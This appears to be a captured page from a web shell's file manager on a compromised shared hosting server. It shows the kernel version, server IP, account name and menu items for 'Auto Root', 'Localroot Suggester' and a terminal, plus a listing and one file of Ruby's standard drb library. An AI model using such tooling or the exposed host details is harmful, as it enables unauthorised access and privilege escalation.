Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.216.32
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ruby /
drb /
Delete
Unzip
Name
Size
Permission
Date
Action
acl.rb
4.61
KB
-rw-r--r--
2026-07-22 12:37
drb.rb
57.63
KB
-rw-r--r--
2026-07-22 12:37
eq.rb
275
B
-rw-r--r--
2026-07-22 12:37
extserv.rb
840
B
-rw-r--r--
2026-07-22 12:37
extservm.rb
1.8
KB
-rw-r--r--
2026-07-22 12:37
gw.rb
3
KB
-rw-r--r--
2026-07-22 12:37
invokemethod.rb
777
B
-rw-r--r--
2026-07-22 12:37
observer.rb
671
B
-rw-r--r--
2026-07-22 12:37
ssl.rb
11.89
KB
-rw-r--r--
2026-07-22 12:37
timeridconv.rb
2.16
KB
-rw-r--r--
2026-07-22 12:37
unix.rb
2.78
KB
-rw-r--r--
2026-07-22 12:37
version.rb
35
B
-rw-r--r--
2026-07-22 12:37
weakidconv.rb
1.12
KB
-rw-r--r--
2026-07-22 12:37
Save
Rename
# frozen_string_literal: false # for ruby-1.8.0 module DRb # :nodoc: all class DRbServer module InvokeMethod18Mixin def block_yield(x) if x.size == 1 && x[0].class == Array x[0] = DRbArray.new(x[0]) end @block.call(*x) end def perform_with_block @obj.__send__(@msg_id, *@argv) do |*x| jump_error = nil begin block_value = block_yield(x) rescue LocalJumpError jump_error = $! end if jump_error case jump_error.reason when :break break(jump_error.exit_value) else raise jump_error end end block_value end end end end end